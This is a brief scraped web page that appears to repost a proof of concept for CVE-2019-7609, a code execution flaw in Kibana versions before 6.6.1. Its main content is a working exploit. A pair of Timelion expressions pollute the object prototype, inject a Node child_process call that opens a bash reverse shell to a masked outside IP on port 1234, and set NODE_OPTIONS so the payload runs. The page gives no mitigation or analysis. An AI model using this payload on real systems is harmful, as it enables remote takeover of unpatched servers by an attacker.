Log kibana
the PoC
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/1234 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Kibana <6.6.1 code execution vulnerability reproduction CVE-2019-7609
Guess you like
Origin www.cnblogs.com/mrhonest/p/11711769.html
Recommended
Ranking